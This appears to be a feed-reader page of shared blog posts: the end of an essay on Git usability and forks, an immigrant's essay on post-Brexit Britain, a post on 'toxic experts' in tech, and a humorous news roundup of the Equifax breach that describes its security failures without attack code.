This nameless workflow may sound radical. But that's because we're all conditioned to naming things. I initially thought it was crazy as well. But once you have a mechanism that gives you rapid access to data you care about (hg show work in Mercurial's case), names become very optional. Now, a pure nameless workflow isn't without its limitations. You want names to identify the main targets for work (e.g. the master branch). And when you exchange work with others, names are easier to work with, especially since names survive rewriting. But in my experience, most of my commits are only exchanged with me (synchronizing my in-progress commits across devices) and with code review tools (which don't really need names and can operate against raw commits). My most frequent use of names comes when I'm in repository maintainer mode and I need to ensure commits have names for others to reference.

Could Git support nameless workflows? In theory it can.

Git needs refs to find relevant commits in its store. And the wire protocol uses refs to exchange data. So refs have to exist for Git to function (assuming Git doesn't radically change its storage and exchange mechanisms to mitigate the need for refs, but that would be a massive change and I don't see this happening).

While there is a fundamental requirement for refs to exist, this doesn't necessarily mean that user-facing names must exist. The reason that we need branches today is because branches are little more than a ref with special behavior. It is theoretically possible to invent a mechanism that transparently maps nameless commits onto refs. For example, you could create a refs/nameless/ namespace that was automatically populated with DAG heads that didn't have names attached. And Git could exchange these refs just like it can branches today. It would be a lot of work to think through all the implications and to design and implement support for nameless development in Git. But I think it is possible.

I encourage the Git community to investigate supporting nameless workflows. Having adopted this workflow in Mercurial, Git's workflow around naming branches feels heavyweight and restrictive to me. Put another way, nameless commits are actually lighter-weight branches than Git branches! To the common user who just wants version control to be a save feature, requiring names establishes a barrier towards that goal. So removing the naming requirement would make Git simpler and more approachable to new users.

Forks aren't the Model You are Looking For

This section is more about hosted Git services (like GitHub, Bitbucket, and GitLab) than Git itself. But since hosted Git services are synonymous with Git and interaction with a hosted Git services is a regular part of a common Git user's workflow, I feel like I need to cover it. (For what it's worth, my experience at Mozilla tells me that a large percentage of people who say I prefer Git or we should use Git actually mean I like GitHub. Git and GitHub/Bitbucket/GitLab are effectively the same thing in the minds of many and anyone finding themselves discussing version control needs to keep this in mind because Git is more than just the command line tool: it is an ecosystem.)

I'll come right out and say it: I think forks are a relatively poor model for collaborating. They are light years better than what existed before. But they are still so far from the turn-key experience that should be possible. The fork hasn't really changed much since the current implementation of it was made popular by GitHub many years ago. And I view this as a general failure of hosted services to innovate.

So we have a shared understanding, a fork (as implemented on GitHub, Bitbucket, GitLab, etc) is essentially a complete copy of a repository (a git clone if using Git) and a fresh workspace for additional value-added services the hosting provider offers (pull requests, issues, wikis, project tracking, release tracking, etc). If you open the main web page for a fork on these services, it looks just like the main project's. You know it is a fork because there are cosmetics somewhere (typically next to the project/repository name) saying forked from.

Before service providers adopted the fork terminology, fork was used in open source to refer to a splintering of a project. If someone or a group of people didn't like the direction a project was taking, wanted to take over ownership of a project because of stagnation, etc, they would fork it. The fork was based on the original (and there may even be active collaboration between the fork and original), but the intent of the fork was to create distance between the original project and its new incantation. A new entity that was sufficiently independent of the original.

Forks on service providers mostly retain this old school fork model. The fork gets a new copy of issues, wikis, etc. And anyone who forks establishes what looks like an independent incantation of a project. It's worth noting that the execution varies by service provider. For example, GitHub won't enable Issues for a fork by default, thereby encouraging people to file issues against the upstream project it was forked from. (This is good default behavior.)

And I know why service providers (initially) implemented things this way: it was easy. If you are building a product, it's simpler to just say a user's version of this project is a git clone and they get a fresh database. On a technical level, this meets the traditional definition of fork. And rather than introduce a new term into the vernacular, they just re-purposed fork (albeit with softer connotations, since the traditional fork commonly implied there was some form of strife precipitating a fork).

To help differentiate flavors of forks, I'm going to define the terms soft fork and hard fork. A soft fork is a fork that exists for purposes of collaboration. The differentiating feature between a soft fork and hard fork is whether the fork is intended to be used as its own project. If it is, it is a hard fork. If not - if all changes are intended to be merged into the upstream project and be consumed from there - it is a soft fork.

I don't have concrete numbers, but I'm willing to wager that the vast majority of forks on Git service providers which have changes are soft forks rather than hard forks. In other words, these forks exist purely as a conduit to collaborate with the canonical/upstream project (or to facilitate a short-lived one-off change).

The current implementation of fork - which borrows a lot from its predecessor of the same name - is a good - but not great - way to facilitate collaboration. It isn't great because it technically resembles what you'd expect to see for hard fork use cases even though it is used predominantly with soft forks. This mismatch creates problems.

If you were to take a step back and invent your own version control hosted service and weren't tainted by exposure to existing services and were willing to think a bit beyond making it a glorified frontend for the git command line interface, you might realize that the problem you are solving - the product you are selling - is collaboration as a service, not a Git hosting service. And if your product is collaboration, then implementing your collaboration model around the hard fork model with strong barriers between the original project and its forks is counterproductive and undermines your own product. But this is how GitHub, Bitbucket, GitLab, and others have implemented their product!

To improve collaboration on version control hosted services, the concept of a fork needs to significantly curtailed. Replacing it should be a UI and workflow that revolves around the central, canonical repository.

You shouldn't need to create your own clone or fork of a repository in order to contribute. Instead, you should be able to clone the canonical repository. When you create commits, those commits should be stored and/or more tightly affiliated with the original project - not inside a fork.

One potential implementation is doable today. I'm going to call it workspaces. Here's how it would work.

There would exist a namespace for refs that can be controlled by the user. For example, on GitHub (where my username is indygreg), if I wanted to contribute to some random project, I would git push my refs somewhere under refs/users/indygreg/ directly to that project's. No forking necessary. If I wanted to contribute to a project, I would just clone its repo then push to my workspace under it. You could do this today by configuring your Git refspec properly. For pushes, it would look something like refs/heads/*:refs/users/indygreg/* (that tells Git to map local refs under refs/heads/ to refs/users/indygreg/ on that remote repository). If this became a popular feature, presumably the Git wire protocol could be taught to advertise this feature such that Git clients automatically configured themselves to push to user-specific workspaces attached to the original repository.

There are several advantages to such a workspace model. Many of them revolve around eliminating forks.

At initial contribution time, no server-side fork is necessary in order to contribute. You would be able to clone and contribute without waiting for or configuring a fork. Or if you can create commits from the web interface, the clone wouldn't even be necessary! Lowering the barrier to contribution is a good thing, especially if collaboration is the product you are selling.

In the web UI, workspaces would also revolve around the source project and not be off in their own world like forks are today. People could more easily see what others are up to. And fetching their work would require typing in their username as opposed to configuring a whole new remote. This would bring communities closer and hopefully lead to better collaboration.

Not requiring forks also eliminates the need to synchronize your fork with the upstream repository. I don't know about you, but one of the things that bothers me about the Game of Refs that Git imposes is that I have to keep my refs in sync with the upstream refs. When I fetch from origin and pull down a new master branch, I need to git merge that branch into my local master branch. Then I need to push that new master branch to my fork. This is quite tedious. And it is easy to merge the wrong branches and get your branch state out of whack. There are better ways to map remote refs into your local names to make this far less confusing.

Another win here is not having to push and store data multiple times. When working on a fork (which is a separate repository), after you git fetch changes from upstream, you need to eventually git push those into your fork. If you've ever worked on a large repository and didn't have a super fast Internet connection, you may have been stymied by having to git push large amounts of data to your fork. This is quite annoying, especially for people with slow Internet connections. Wouldn't it be nice if that git push only pushed the data that was truly new and didn't already exist somewhere else on the server? A workspace model where development all occurs in the original repository would fix this. As a bonus, it would make the storage problem on servers easier because you would eliminate thousands of forks and you probably wouldn't have to care as much about data duplication across repos/clones because the version control tool solves a lot of this problem for you, courtesy of having all data live alongside or in the original repository instead of in a fork.

Another win from workspace-centric development would be the potential to do more user-friendly things after pull/merge requests are incorporated in the official project. For example, the ref in your workspace could be deleted automatically. This would ease the burden on users to clean up after their submissions are accepted. Again, instead of mashing keys to play the Game of Refs, this would all be taken care of for you automatically. (Yes, I know there are scripts and shell aliases to make this more turn-key. But user-friendly behavior shouldn't have to be opt-in: it should be the default.)

But workspaces aren't all rainbows and unicorns. There are access control concerns. You probably don't want users able to mutate the workspaces of other users. Or do you? You can make a compelling case that project administrators should have that ability. And what if someone pushes bad or illegal content to a workspace and you receive a cease and desist? Can you take down just the offending workspace while complying with the order? And what happens if the original project is deleted? Do all its workspaces die with it? These are not trivial concerns. But they don't feel impossible to tackle either.

Workspaces are only one potential alternative to forks. And I can come up with multiple implementations of the workspace concept. Although many of them are constrained by current features in the Git wire protocol. But Git is (finally) getting a more extensible wire protocol, so hopefully this will enable nice things.

I challenge Git service providers like GitHub, Bitbucket, and GitLab to think outside the box and implement something better than how forks are implemented today. It will be a large shift. But I think users will appreciate it in the long run.

Conclusion

Git is an ubiquitous version control tool. But it is frequently lampooned for its poor usability and documentation. We even have research papers telling us which parts are bad. Nobody I know has had a pleasant initial experience with Git. And it is clear that few people actually understand Git: most just know the command incantations they need to know to accomplish a small set of common activities. (If you are such a person, there is nothing to be ashamed about: Git is a hard tool.)

Popular Git-based hosting and collaboration services (such as GitHub, Bitbucket, and GitLab) exist. While they've made strides to make it easier to commit data to a Git repository (I purposefully avoid saying use Git because the most usable tools seem to avoid the git command line interface as much as possible), they are often a thin veneer over Git itself (see forks). And Git is a thin veneer over a content indexed key-value store (see forced usage of bookmarks).

As an industry, we should be concerned about the lousy usability of Git and the tools and services that surround it. Some may say that Git - with its near monopoly over version control mindset - is a success. I have a different view: I think it is a failure that a tool with a user experience this bad has achieved the success it has.

The cost to Git's poor usability can be measured in tens if not hundreds of millions of dollars in time people have wasted because they couldn't figure out how to use Git. Git should be viewed as a source of embarrassment, not a success story.

What's really concerning is that the usability problems of Git have been known for years. Yet it is as popular as ever and there have been few substantial usability improvements. We do have some alternative frontends floating around. But these haven't caught on.

I'm at a loss to understand how an open source tool as popular as Git has remained so mediocre for so long. The source code is out there. Anybody can submit a patch to fix it. Why is it that so many people get tripped up by the same poor usability issues years after Git became the common version control tool? It certainly appears that as an industry we have been unable or unwilling to address systemic deficiencies in a critical tool. Why this is, I'm not sure.

Despite my pessimism about Git's usability and its poor track record of being attentive to the needs of people who aren't power users, I'm optimistic that the future will be brighter. While the ~7000 words in this post pale in comparison to the aggregate word count that has been written about Git, hopefully this post strikes a nerve and causes positive change. Just because one generation has toiled with the usability problems of Git doesn't mean the next generation has to suffer through the same. Git can be improved and I encourage that change to happen. The three issues above and their possible solutions would be a good place to start.

Read the whole story
miestasmagnus
2596 days ago
reply
Share this story
Delete

Working to Rule

6 Shares

“Not my circus, not my monkeys”.

That’s what I mostly say these days when asked about British politics. Up to about a year ago, I was an active member of a political party and involved in a fair amount of volunteering. I saw myself as being part of things, an enthusiastic party to the social contract. Those days are done.

I’ve been an immigrant in four different countries, and in only one of them did I ever feel at home. I used to tell this story about being a civil liberties lobbyist in the UK in the early 2000s. I’d go and do a briefing over tea and biscuits with some member of the House of Lords. They’d start a little in surprise at my accent, and then the meeting would go on as normal, with me offering talking points about the surveillance and police state as counter-productive in fighting terrorism. Then at the end, when the business of the meeting was finished and everyone relaxed and munched the biscuits, the peer would make a point of telling me how much they liked Ireland, had relatives there, had visited or wanted to, some day. As if they were saying “It’s ok for Irish people to lecture us on human rights and terrorism, now.” My story was about tolerance and civility, and how no way could an Arab have a similar meeting in Paris or Washington D.C.

Maybe it’s just as well we white, well-to-do professionals are getting the same stick other immigrants or minorities always have. The gloves are off. An Italian friend was accosted by two men in the cinema queue in Oxford and told to “go home”, for the crime of speaking Italian. (Because she’s a badass, she bought them popcorn and they didn’t know what to do with themselves.) A woman I met last week was abused in the street for speaking Polish on her phone. I can pass until I open my mouth, and if I try I can sound fairly British. But I don’t want to.

Perhaps the UK only feels significantly nastier because it now treats white, middle class EU people more like how it treats the brown-skinned, less connected, less wealthy, or less likely to be able to kick up a stink people. My kind can still get a Guardian sad-face piece if the Home Office messes us around. We have our liberty and our voice. But can any of us say we know what is going on in, say, Yarl’s Wood detention centre, or that its secrecy, authoritarianism and arms-length contractual deniability are not the perfect conditions for institutional abuse? We’ve all heard that kind of story a dozen times, but can no longer even be arsed to say “never again”.

I live in Theresa May’s “hostile environment” for immigrants, seeded several years ago, and bearing poisonus fruit just this morning as the first day when foreign-seeming people can be stopped from using the NHS. EU citizens are still a lot more equal than other immigrants. (And Irish people more equal again, in terms of our legal status, because of history.) I’m extremely lucky. All I have to worry about are the value of my home slipping (frightening for us, but a property crash would help more people than it hurts, generationally), my ability to find work (most of mine comes from outside the UK, anyway), and the rather bad luck that every time I try to send money to my under-water Irish mortgage, the prime minister opens her mouth and the pound plummets, again. My concerns are incredibly minor and show just how privileged I am.

I’m not getting letters from the Home Office, telling me to leave, or bills from my local NHS’s fraud department, insisting my newborn had no right to treatment. I have no relatives caught up in the grey netherworld of the asylum system, being told they weren’t actually raped and they’re not actually gay, and will therefore be detained without time-limit. I don’t have to prove to a sociopathic immigration regime that, although I spend my time caring for children or ill family members now, I will in the future earn enough money to not be a “burden”. I don’t need to fear that calling the police to protect my children from domestic violence will result in the Home Office being alerted to our presence, and the whole family being deported.

The UK has become a nasty little country. It sticks out a bit less in a neighbourhood with Austria, Hungary, Poland and Turkey nearby. But as a country, the UK is working hard to make itself objectively nastier, and to suppress the voices of those in British society who could curb its sharpest, most small-minded insecurities. Charities here are gagged from speaking about poverty, church-leaders and protesters go unreported and ignored. Xenophobic attacks are up by almost a third, since the Brexit vote. The government and media thinks it’s unremarkable for people on benefits – and their children – to go without a penny of income for two or three months at a time. (And when they eventually get paid, to go without when there’s a fifth Monday in the month.) Women inmates in the prison system have a lower chance of survival than did British soldiers in Afghanistan. The education system is expressly designed to herd the 93% with rote-learning, box-ticking and arbitrary discipline into a life of menial under-employment, while the 7% enjoy Olympic-sized swimming pools and theatres better equipped than most professional ones. And when privatized state school “academy” chains go tits-up, the funds raised by their Christmas fairs and sponsored runs are asset-stripped by company directors, but private schools for the wealthiest are officially charities, with £100 million in tax benefits a year. The country’s flagship news programme thinks “balance” is pitting a soft versus a hard brexiteer, and the millionaire-funded Leave campaign admits using botnets to spread its lies, but no one even shrugs.

But there you go. That’s how I would see things, wouldn’t I? What with being a saboteur and enemy of the state, and a foreigner, to boot.

Anyone who thinks being an immigrant, even a deluxe EU three million-type immigrant, is easy, should try it. We compete on equal terms with all comers, but with no social or economic safety net and, for many, hustling like mad in second and third languages. No dole, no network of couches to sleep on, no contacts and no introductions; qualifications from institutions you’ve never heard of, references from employers you aren’t sure are real but can’t be bothered to check, acting as daily fodder for stereotypical jokes we laugh off to show we’re one of you. You don’t hear us complaining about it because it’s just part of the deal. But when the terms of the deal change, and you tell us we’re social welfare parasites who are also, somehow, taking all the jobs and are the reason the country is failing, then the deal is probably dead.

The government and brexiteers’ empty claims that “it’ll be fine” are not reassuring. They unwittingly communicate the contempt we are held in, the manifest unimportance of our plight. I don’t see acres of think-pieces on why the government and the Labour party should ‘reach out’ to economic migrants and try to understand us. Ironically, we’re the ones keeping the stiff upper lip because we know we’re not allowed the luxury of an epic, country-wide tantrum.

Right after the brexit result, I felt sorriest for my British friends who were having part of their identity yanked away. I’ve even been told once or twice in the last year that it was worse for them, because at least I could move away. And I agreed. But I don’t any more. Their lives are going on as before, albeit in a poisonous political atmosphere. But ours have changed. EU citizens in the UK worry about their ability to stay employed, are being refused mortgages and rental contracts, are shouted at in the street, don’t know what will become of their pension contributions and fear they could be just one family crisis away from losing their “right to remain”.

I thought I would feel better over time. That the sorrow and fear at being in a country turning its back on internationalism at the precise historic moment when our biggest problems are cross-border would be replaced by something less painful and more constructive. After the referendum I went to a few more meetings. Over the winter I made signs for protest marches. After the women’s march last January, I felt I could almost breathe again. But since then it’s just gotten worse. A couple of times this year, I’ve been on the phone to my mother in Ireland and she’s repeatedly asked “But don’t they know…” about certain pertinent economic facts or how treaties work or what happens when the peace process collapses. And I have to answer that no, honestly, a lot of people don’t know the basic facts of their own existence, and it is no longer politically feasible for politicians to mention these facts. And that most newspapers do not report these facts because these facts have become unpatriotic. And that there is no opposition. And that lies, repeated often and brazenly enough, are pretty much all that is left of British politics.

I suppose part of my feeling worse over time is that Britain is actively choosing to be this way. The liars lie and you pretend to give them a hearing. The poor suffer, and sometimes burn, but can’t be saved or housed. The immigrants take their lumps, and plan, and quietly disappear. And the politicians give a week and more to standing around, whining about a fucking clock, and pronounce any work on fixing the mess they’ve made impossible until a farcically bad election campaign has been fought, or party conference season is over or whatever the next Conservative psycho-drama is going to be has played out, while the country stumbles over the cliff because democracy, it now appears, was a one-shot deal.

In all that mess, here’s one thing among the many that seems to have gone unnoticed. When you reduce all your dealings with a group of people to the purely transactional, you may think you are being very clever and forcing a better deal, but you have changed the way those people will interact with you, and also whether they will trust you in future. I used to be an immigrant who, for all the UK’s shortcomings, felt loyalty to my chosen home. And gratitude, though it’s embarrassing to admit that, now. I knew there were certain ways of acting and being the UK had developed for itself – to do with tolerance, civility, self-deprecation, humour, curiosity, a general broad-mindedness and the underlying cultural confidence of a country that knows cooperation isn’t a zero-sum game – that meant there was room for people like me to belong.

(That same expansiveness could be seen in how this country treated its poor, less educated, chronically ill, disabled people, to mention just a few groups. Britain has never had much of a political culture of solidarity or shared purpose, whatever World War II fantasies claim, but it wasn’t vindictive. Now it is. Turn on the television. “Factual television” doesn’t inform or entertain; it pits people against each other in artificial competitions with ever more theatrical ways to tell the losers exactly what they are.)

By reducing the British state’s relationship with the three million EU citizens who live here to a single cost-benefit analysis (calculated with striking actuarial incompetence), the UK has made the mistake so many employers make when they put the bean-counters in charge. They have failed to account for the value of good will. Good will of a company’s suppliers and customers – analogous to a countries’s partners and allies – has a value and can be destroyed. Similarly, working to rule is often one of the first steps employees – in this analogy, immigrants – take towards industrial action. Working to rule demonstrates that for all the Taylorist calculation of what a job entails, it’s the extra 15-20% we do that makes the world go round. The government seems to think it is grown-up and serious to treat us like economic widgets that can be ordered when needed and discarded when not. It’s wrong. It will lose out, too, from making citizenship and belonging purely transactional.

Many immigrants who had felt loyalty, affection and feelings of grateful belonging are now emotionally working to rule. We will go through the motions, paying our taxes and being decent neighbours, perhaps even wearing a poppy, as that ever-lengthening season draws near. But we know our place, now. We get it. We’re not proper citizens, just “economic migrants” or “citizens of nowhere”; assets to be sorted, milked of taxes and then disposed of when no longer revenue-positive. The loyalty that makes people stick around when you’re going through a tough time, as the UK is clearly about to, has gone. The soft power it yielded, by way of people who moved here and, when the time came, moved on with deep ties and happy memories, has gone. This isn’t about revenge, it’s just how the human heart works.

Because it hurts, for me at least. I believed all that inclusive, expansive, tolerance stuff in the first place. Never, in my couple of years as an army wife, did anyone grimace or hesitate or show hostility or even surprise at me being a non-national. There were lots of us amongst the spouses and soldiers; Irish, South Africans, Fijians and more. I baked, fund-raised, spent half a year in the permanent nausea of low-level fear while he was on tour, sat uncomfortably near the front of the church by a coffin with the Union Jack draped over it, comforted – insofar as anyone can – a grieving father, wrote letters of condolence, stood for hours on parade grounds and performed dozens (hundreds?) of the little tasks and favours that just make things go round when you live inside an institution that can ask you for almost anything.

And now I feel like a stupid, naive little fool. I look back on that time and think what baseless, idiotic, pathetic faith I had in something it turns out didn’t exist. Or if it did, it’s gone, so it all meant nothing, anyway.

Whatever the UK does now, the trust, loyalty and affection are gone, and they won’t come back. We know we can’t plan our lives with any certainty. We know we are despised by a large amount of the country, including the government itself. We know the majority of people voted to make our lives unmanageable because they didn’t want to know or just didn’t care. We have all the hurt feelings of kids who used to be in the clique and got kicked out for some unknown slight, but still have to go to school every day anyway. And I use that metaphor advisedly, because I understand that there is something slightly child-like in this feeling of rejection.

But, well, tough luck. It’s a fall from grace but it could be much worse. It has opened our eyes to the truth of the UK’s narrow and punitive social contract. I hope that many of us make common cause with people in the detention centres or at the mercy those who exploit May’s “hostile environment” for their own ends. I hope privileged immigrants join the dots and do what that calls for. God knows I hope the vast number of EU citizens staffing the NHS do all they can to subvert the myth of expensive “health tourism” (a phenomenon I suspect is as rare as false claims of sexual assault and rape, not that you’d know either from reading a British newspaper).

We have a place to live, for now, though it isn’t home, and will never feel like it again. I used to say “we” when I talked about politics in the UK. Now I say “you”, or better, nothing at all.

Read the whole story
miestasmagnus
2632 days ago
reply
brennen
2639 days ago
reply
Boulder, CO
Share this story
Delete

Toxic experts

1 Comment and 5 Shares

I wrote Big-O: how code slows as data grows to explain Big-O notation. My goal was to explain it in broad strokes for people new to the idea. It grew out of thinking I'd been doing about beginners and experts. In the comments, there was an unexpected and unfortunate real-world lesson.

An anonymous coward named "pyon" said I should be ashamed. They pointed out a detail of algorithmic analysis that I had not mentioned. It's a detail that I had never encountered before. I think it's an interesting detail, but not one that needed to be included.

Pyon is an example of a toxic expert. People like this know a lot, but they use that knowledge to separate themselves from the unwashed masses of newbs. Rather than teach, they choose to sneer from their lofty perches, lamenting the state of the world around them, filled as it is with People Who Don't Want To Learn.

The important skill pyon and other toxic experts are missing is how to connect with people. They could use their knowledge to teach, but it's more important to them to separate themselves from others. Points of correctness are useless without points of connection.

Toxic experts care more about making distinctions between people to elevate themselves than they do about helping people. Beware: they are everywhere you look in the tech world. It's easy to run into them when you are trying to learn. Ignore them. They don't know you, and they don't know what you can do.

Pyon is fixated on a particular detail of algorithmic analysis, and feels that it is essential to understanding Big-O. I can tell you is that I am doing fine in my 30-year career, and I had never heard that particular detail. My Big-O piece wasn't meant to be exhaustive. There are entire books written about algorithmic notation. I even wrote at the end, "There's much more to algorithm analysis if you want to get into the true computer science aspects of it, but this is enough for working developers."

But pyon can't see the forest for the trees. Experts have spent a lot of time and energy learning what they know. They love their knowledge. They wouldn't have been able to get where they are without a passion for the subject. But sometimes they have a hard time seeing how people can be successful without that well-loved knowledge. They've lost sight of what it means to be a beginner, and what beginners need to learn.

Toxic experts will latch onto a particular skill and decide that it is essential. For them, that skill is a marker dividing Those-Who-Know from Those-Who-Don't. These shibboleths vary from expert to expert. In the current case, it's a detail of algorithmic analysis. I've seen other toxic experts insist that it's essential to know C, or assembly language, or recursion and pointers, and so on.

I'm not saying those aren't good things to know. The more you know, the better. Every one of these topics will be useful. But they are not essential. You can do good work without them. You certainly don't deserve to be spat upon.

The ultimate irony is that while pyon and other toxic experts are bemoaning the state of the industry because of missing knowledge, they are highlighting the main skill gap the tech industry needs to fix: empathy.

Read the whole story
miestasmagnus
2634 days ago
reply
pfctdayelise
2636 days ago
reply
Melbourne, Australia
Share this story
Delete
1 public comment
jepler
2634 days ago
reply
I'm a recovering toxic expert :-/
Earth, Sol system, Western spiral arm
digdoug
2633 days ago
Me too, it's amazing how much hate I have for people that haven't started recovering yet!

News Roundup: EquiTF

3 Comments and 5 Shares

We generally don’t do news roundups when yet another major company gets hacked and leaks personally compromising data about the public. We know that “big company hacked” isn’t news, it’s a Tuesday. So the Equifax hack didn’t seem like something worth spending any time to write an article about.

But then new things kept coming out. It got worse. And worse. And worse. It’s like if a dumpster caught on fire, but then the fire itself also caught on fire.

If you have been living under a rock, Equifax, a company that spies on the financial behavior of Americans and sells that intelligence to banks, credit card companies, and anyone else who’s paying, was hacked, and the culprits have everything they need to steal the identities of 143 million people.

The Equifax logo being flushed in a toilet, complete with some artsy motion blur

That’s bad, but everything else about it is worse. First, the executives kept the breach secret for months, and then sold stock just before the news went public. That is a move so utterly brazen that they might as well be a drunk guy with no shirt shouting, “Come at me bro! Come at me!” They’re daring the Securities and Exchange Commission to do something about it, and are confident that they won’t be punished.

Speaking of punishment, the CEO retired, and he’ll be crying about this over the $90M he’s collecting this year. The CIO and CSO went first, of course. They probably won’t be getting huge compensation packages, but I’m sure they’ll land cushy gigs somewhere.

Said CSO, by the way, had no real qualifications to be a Chief Security Officer. Her background is in music composition.

Now, I want to be really clear here: I don’t think her college degree is actually relevant. What you did in college isn’t nearly as important as your work experience, which is the real problem- she doesn’t really have that, either. She’s spent her entire career in “executive” roles, and while she was a CSO before going to Equifax, that was at First Data. Funny thing about First Data: up until 2013 (about when she left), it was in a death spiral that was fixed after some serious house-cleaning and restructuring- like clearing out dead-weight in their C-level.

Don't worry about the poor shareholders, though. Remember Wells Fargo, the bank that fraudulently signed up lots of people for accounts? They list Equifax as an investment opportunity that's ready to "outperform".

That’s the Peter Principle and corporate douchebaggerry in action, and it certainly starts getting me angry, but this site isn’t about class struggle- it’s about IT. And it’s on the IT side where the real WTFs come into play.

Equifax spies on you and sells the results. The US government put a mild restriction on this behavior: they can spy on you, but you have the right to demand that they stop selling the results. This is a “credit freeze”, and every credit reporting agency- every business like Equifax- has to do this. They get to charge you money for the privilege, but they have to do it.

To “secure” this transaction, when you freeze your credit, the credit reporting companies give you a “password” which you can use in the future to unfreeze it (because if you want a new credit card, you have to let Equifax share your data again). Some agencies give you a random string. Some let you choose your own password. Equifax used the timestamp on your request.

The hack itself was due to an unpatched Struts installation. The flaw itself is a pretty fascinating one, where a maliciously crafted XML file gets deserialized into a ProcessBuilder object. The flaw was discovered in March, and a patch was available shortly thereafter. Apache rightfully called it “Critical”, and encouraged all Struts users to apply the fix.

Even if they didn’t apply the fix, Apache provided workarounds- some of which were as simple as, “Turn off the REST plugin if you’re not using it,” or “if you ARE using it, turn off the XML part”. It’s certainly not the easiest fix, especially if you’re on a much older version of Struts, but you could even patch just the REST plugin, cutting down on the total work.

Now, if you’re paying attention, you might be saying to yourself, “Hey, Remy, didn’t you say that they were breached (initially) in March? The month the bug was discovered? Isn’t it kinda reasonable that they wouldn’t have rolled out the fix in time?” Yes, that would be reasonable: if a flaw exposed in March was exploited within a few days or even weeks of the flaw being discovered, I could understand that. But remember, the breach that actually got announced was in July- they were breached in March, and they still didn’t apply the patch. This honestly makes it worse.

Even then, I’d argue that we’re giving them too much of the benefit of the doubt. I’m going to posit that they simply don’t care. Not only did they not apply the patch, they likely had no intention of applying the patch, because they assumed they’d get away with it. Remember: you are the product, not the customer. If they accidentally cut the sheep while shearing, it doesn’t matter: they’ve still got the wool.

As an example of “they clearly don’t care”, let’s turn our attention to their Argentinian Branch, where their employee database was protected by the password admin/admin. Yes, with that super-secure password, you could log in from anywhere in the world and see the users usernames, employee IDs, and personal details. Of course, their passwords were obscured as “******”… in the rendered DOM. A simple “View Source” would reveal the plaintext of their passwords, in true “hunter2” fashion.

Don’t worry, it gets dumber. Along with the breach announcement, Equifax took to social media to direct users to a site where, upon entering their SSN, it would tell them whether or not they were compromised. That was the promise, but the reality was that it was little better than flipping a coin. Worse, the site was a thinly veiled ad for their "identity protection" service, and the agreement contained an arbitration clause which kept you from suing them.

That is, at least if you went to the right site. Setting aside the wisdom of encouraging users to put confidential information into random websites, for weeks Equifax’s social media team was directing people to the wrong site! In fact, it was directing them to a site which warns about the dangers of putting confidential information into random websites.

And all of that, all of that, isn’t the biggest WTF. The biggest WTF is the Social Security Number, which was never meant to be used as a private identifier, but as it’s the closest thing to unique data about every American, it substitutes for a national identification system even when it’s clearly ill-suited to the task.

I’ll leave you with the CGP Grey video on the subject:

[Advertisement] Release! is a light card game about software and the people who make it. Play with 2-5 people, or up to 10 with two copies - only $9.95 shipped!
Read the whole story
miestasmagnus
2668 days ago
reply
Share this story
Delete
3 public comments
jasoncrowther
2669 days ago
reply
Ouch.
chrisminett
2669 days ago
reply
Wow
Milton Keynes, UK
zippy72
2672 days ago
reply
Equifax: "it’s like if a dumpster caught on fire, but then the fire itself also caught on fire." Perfect.
FourSquare, qv
Next Page of Stories